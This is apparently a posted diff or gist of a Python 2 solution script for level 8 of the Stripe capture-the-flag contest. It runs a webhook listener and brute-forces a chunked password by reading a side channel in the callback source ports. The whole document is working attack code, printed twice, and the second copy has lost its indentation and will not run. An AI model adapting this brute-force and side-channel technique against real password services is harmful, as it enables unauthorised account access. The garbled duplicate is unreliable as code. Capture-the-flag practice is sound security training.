daegalus · December 14, 2015 12:08
diff --git a/level8.py b/level8.py
 import urllib2
 import json
 import SocketServer
 import socket
 import threading
 import sys
 import time

 url = 'https://level08-3.stripe-ctf.com/user-ilxzfufcbq/'
 password1 = 0
 password2 = 0
 password3 = 0
 password4 = 0
 p1final = 0
 p2final = 0
 p3final = 0
 p4final = 0
 p1done = False
 p2done = False
 p3done = False
 p4done = False
 #webhooks
 prevport = 0
 curport = 0
 p1counter = 0
 p2counter = 0
 p3counter = 0
 p4counter = 0

 class WebhookHandler(SocketServer.BaseRequestHandler):

    def handle(self):
        global url, password1, password2, password3, password4, p1done, p2done, p3done, p4done, webhooks, prevport, curport, p1final, p2final, p3final, p4final, p1counter, p2counter, p3counter, p4counter
        
        data = self.request.recv(1024)
 	ip, curport = self.request.getpeername()
        portdiff = (curport - prevport)
        prevport = curport  
        self.request.close()
        status = 'true' in data
        
        if portdiff == 2 and not p1done:
 	    print str(portdiff)+": "+str(password1)
            p1counter = 0
            p2counter = 0
            p3counter = 0
            p4counter = 0
            password1+=1
            request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
        
        elif portdiff == 3 and not p2done:
            print str(portdiff)+": "+str(password2)
            p1counter+=1
            if p1counter < 5:
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
            else:
                p1done = True;
                p1final = password1
                print "Found chunk #1: "+str(p1final)
                password2+=1;
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
                p2counter = 0
                p3counter = 0
                p4counter = 0
                
        elif portdiff == 4 and not p3done:
 	    print str(portdiff)+": "+str(password3)
            p2counter+=1
            if p2counter <5:
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
            else:
                p2done = True;
                p2final = password2
                print 'Found chunk #2: '+str(p2final)
                password3+=1
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
                p3counter = 0
                p4counter = 0
                
        elif portdiff == 5 and not p4done:
 	    print str(portdiff)+": "+str(password4)
            p3counter+=1
            if p3counter < 5:
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
            else:
                p3done = True;
                p3final = password3;
                print "Found chunk #3: "+str(p3final)
                password4+=1
                request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(p3final).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
        
 	else:
 	    request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
        if status:
            p4done = True
            p4final = password4
            print "Found chunk #4: "+(p4final)
                
                
           
        
        if p1done and p2done and p3done and p4done:
            print str(p1final)+str(p2final)+str(p3final)+str(p4final)
        
        return    
        
 if __name__ == '__main__':

    address = ('0.0.0.0', 0) # let the kernel give us a port
    server = SocketServer.TCPServer(address, WebhookHandler)
    ip, port = server.server_address # find out what port we were given
    global webhooks
    webhooks = ["level02-2.stripe-ctf.com:"+str(port)]    
    print webhooks
    print str(ip)+":"+str(port)
    #t = threading.Thread(target=server.serve_forever)
    #t.setDaemon(True) # don't hang on exit
    #t.start()
    
    server.serve_forever()
	import urllib2
	import json
	import SocketServer
	import socket
	import threading
	import sys
	import time

	url = 'https://level08-3.stripe-ctf.com/user-ilxzfufcbq/'
	password1 = 0
	password2 = 0
	password3 = 0
	password4 = 0
	p1final = 0
	p2final = 0
	p3final = 0
	p4final = 0
	p1done = False
	p2done = False
	p3done = False
	p4done = False
	#webhooks
	prevport = 0
	curport = 0
	p1counter = 0
	p2counter = 0
	p3counter = 0
	p4counter = 0

	class WebhookHandler(SocketServer.BaseRequestHandler):

	def handle(self):
	global url, password1, password2, password3, password4, p1done, p2done, p3done, p4done, webhooks, prevport, curport, p1final, p2final, p3final, p4final, p1counter, p2counter, p3counter, p4counter

	data = self.request.recv(1024)
	ip, curport = self.request.getpeername()
	portdiff = (curport - prevport)
	prevport = curport
	self.request.close()
	status = 'true' in data

	if portdiff == 2 and not p1done:
	print str(portdiff)+": "+str(password1)
	p1counter = 0
	p2counter = 0
	p3counter = 0
	p4counter = 0
	password1+=1
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))

	elif portdiff == 3 and not p2done:
	print str(portdiff)+": "+str(password2)
	p1counter+=1
	if p1counter < 5:
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	else:
	p1done = True;
	p1final = password1
	print "Found chunk #1: "+str(p1final)
	password2+=1;
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	p2counter = 0
	p3counter = 0
	p4counter = 0

	elif portdiff == 4 and not p3done:
	print str(portdiff)+": "+str(password3)
	p2counter+=1
	if p2counter <5:
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	else:
	p2done = True;
	p2final = password2
	print 'Found chunk #2: '+str(p2final)
	password3+=1
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	p3counter = 0
	p4counter = 0

	elif portdiff == 5 and not p4done:
	print str(portdiff)+": "+str(password4)
	p3counter+=1
	if p3counter < 5:
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	else:
	p3done = True;
	p3final = password3;
	print "Found chunk #3: "+str(p3final)
	password4+=1
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(p1final).zfill(3)+str(p2final).zfill(3)+str(p3final).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))

	else:
	request = urllib2.urlopen(url, json.JSONEncoder().encode({"password": str(password1).zfill(3)+str(password2).zfill(3)+str(password3).zfill(3)+str(password4).zfill(3), "webhooks": webhooks}))
	if status:
	p4done = True
	p4final = password4
	print "Found chunk #4: "+(p4final)




	if p1done and p2done and p3done and p4done:
	print str(p1final)+str(p2final)+str(p3final)+str(p4final)

	return

	if __name__ == '__main__':

	address = ('0.0.0.0', 0) # let the kernel give us a port
	server = SocketServer.TCPServer(address, WebhookHandler)
	ip, port = server.server_address # find out what port we were given
	global webhooks
	webhooks = ["level02-2.stripe-ctf.com:"+str(port)]
	print webhooks
	print str(ip)+":"+str(port)
	#t = threading.Thread(target=server.serve_forever)
	#t.setDaemon(True) # don't hang on exit
	#t.start()

	server.serve_forever()